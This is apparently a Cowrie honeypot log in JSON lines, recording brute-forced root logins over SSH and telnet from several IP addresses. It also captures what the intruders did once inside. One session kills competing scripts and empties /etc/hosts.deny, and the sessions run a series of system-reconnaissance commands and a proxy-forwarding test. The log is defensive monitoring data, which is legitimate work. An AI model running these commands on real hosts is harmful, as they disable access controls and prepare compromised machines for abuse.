{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/18077e64c06a52a9e86fe6c8c02fd28f006e5efd3db8a3b84bd2033d3b744e3c","size":21,"shasum":"18077e64c06a52a9e86fe6c8c02fd28f006e5efd3db8a3b84bd2033d3b744e3c","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/18077e64c06a52a9e86fe6c8c02fd28f006e5efd3db8a3b84bd2033d3b744e3c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:39:51.405966Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:39:51.936367Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T18:39:51.937198Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T18:39:52.173979Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:39:52.174978Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:39:52.671693Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T18:39:52.672619Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:39:52.909386Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:39:53.133885Z","src_ip":"212.227.235.229","session":"2b654ed156a3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:39:53.473012Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-26T18:39:53.473703Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:39:53.709111Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:39:54.244099Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-26T18:39:54.244838Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-26T18:39:54.245418Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:39:54.483449Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:39:54.972581Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-26T18:39:54.973074Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:39:55.209186Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:39:55.780262Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-26T18:39:55.780927Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":205,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:39:56.019080Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:39:56.511545Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-26T18:39:56.512309Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:39:56.749196Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:39:57.333647Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T18:39:57.334714Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:39:57.570960Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:39:58.134144Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-26T18:39:58.135210Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:39:58.371174Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:39:58.858971Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-26T18:39:58.859811Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:39:59.094493Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:39:59.664155Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T18:39:59.664966Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:39:59.900892Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:40:00.389881Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T18:40:00.390727Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:40:00.625807Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:40:01.207292Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T18:40:01.208215Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:40:01.443944Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:40:02.028621Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T18:40:02.033252Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:40:02.273576Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.session.closed","duration":"23.6","message":"Connection lost after 23.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:40:02.275323Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27037,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f0fc00fbaf9","protocol":"ssh","message":"New connection: 213.209.150.239:27037 (1.2.3.4:22) [session: 0f0fc00fbaf9]","sensor":"my-vps","timestamp":"2025-08-26T18:41:08.943923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:41:08.944810Z","src_ip":"213.209.150.239","session":"0f0fc00fbaf9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T18:41:08.991781Z","src_ip":"213.209.150.239","session":"0f0fc00fbaf9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:41:09.226284Z","src_ip":"213.209.150.239","session":"0f0fc00fbaf9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":6811,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:6811","sensor":"my-vps","timestamp":"2025-08-26T18:41:09.274345Z","session":"0f0fc00fbaf9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T18:41:09.321478Z","src_ip":"213.209.150.239","session":"0f0fc00fbaf9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":8842,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:8842","sensor":"my-vps","timestamp":"2025-08-26T18:41:09.457464Z","session":"0f0fc00fbaf9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T18:41:09.504785Z","src_ip":"213.209.150.239","session":"0f0fc00fbaf9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:41:09.552872Z","src_ip":"213.209.150.239","session":"0f0fc00fbaf9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":14897,"dst_ip":"1.2.3.4","dst_port":22,"session":"2612dba8a069","protocol":"ssh","message":"New connection: 212.227.235.229:14897 (1.2.3.4:22) [session: 2612dba8a069]","sensor":"my-vps","timestamp":"2025-08-26T18:41:34.330919Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:41:34.332172Z","src_ip":"212.227.235.229","session":"2612dba8a069"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T18:41:34.498122Z","src_ip":"212.227.235.229","session":"2612dba8a069"}
{"eventid":"cowrie.login.success","username":"root","password":"Password123","message":"login attempt [root/Password123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:41:35.000340Z","src_ip":"212.227.235.229","session":"2612dba8a069"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:41:35.364041Z","src_ip":"212.227.235.229","session":"2612dba8a069"}
{"eventid":"cowrie.command.input","input":"netstat -tulpn | head -10","message":"CMD: netstat -tulpn | head -10","sensor":"my-vps","timestamp":"2025-08-26T18:41:35.365079Z","src_ip":"212.227.235.229","session":"2612dba8a069"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","size":28,"shasum":"f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:41:35.534185Z","src_ip":"212.227.235.229","session":"2612dba8a069"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:41:35.535720Z","src_ip":"212.227.235.229","session":"2612dba8a069"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38520,"dst_ip":"1.2.3.4","dst_port":22,"session":"c495d4a0c675","protocol":"ssh","message":"New connection: 212.227.235.229:38520 (1.2.3.4:22) [session: c495d4a0c675]","sensor":"my-vps","timestamp":"2025-08-26T18:42:14.923563Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:42:15.811529Z","src_ip":"212.227.235.229","session":"c495d4a0c675"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T18:42:15.812327Z","src_ip":"212.227.235.229","session":"c495d4a0c675"}
{"eventid":"cowrie.login.success","username":"root","password":"000005","message":"login attempt [root/000005] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:42:20.239235Z","src_ip":"212.227.235.229","session":"c495d4a0c675"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:42:20.968531Z","src_ip":"212.227.235.229","session":"c495d4a0c675"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":55129,"dst_ip":"1.2.3.4","dst_port":23,"session":"e35eb058c9a7","protocol":"telnet","message":"New connection: 123.31.39.100:55129 (1.2.3.4:23) [session: e35eb058c9a7]","sensor":"my-vps","timestamp":"2025-08-26T18:42:22.385446Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46414,"dst_ip":"1.2.3.4","dst_port":23,"session":"1450b3e5280d","protocol":"telnet","message":"New connection: 212.227.235.229:46414 (1.2.3.4:23) [session: 1450b3e5280d]","sensor":"my-vps","timestamp":"2025-08-26T18:42:22.509883Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60352,"dst_ip":"1.2.3.4","dst_port":22,"session":"86d6bbc0fc7b","protocol":"ssh","message":"New connection: 212.227.235.229:60352 (1.2.3.4:22) [session: 86d6bbc0fc7b]","sensor":"my-vps","timestamp":"2025-08-26T18:43:07.294327Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:43:07.295685Z","src_ip":"212.227.235.229","session":"86d6bbc0fc7b"}
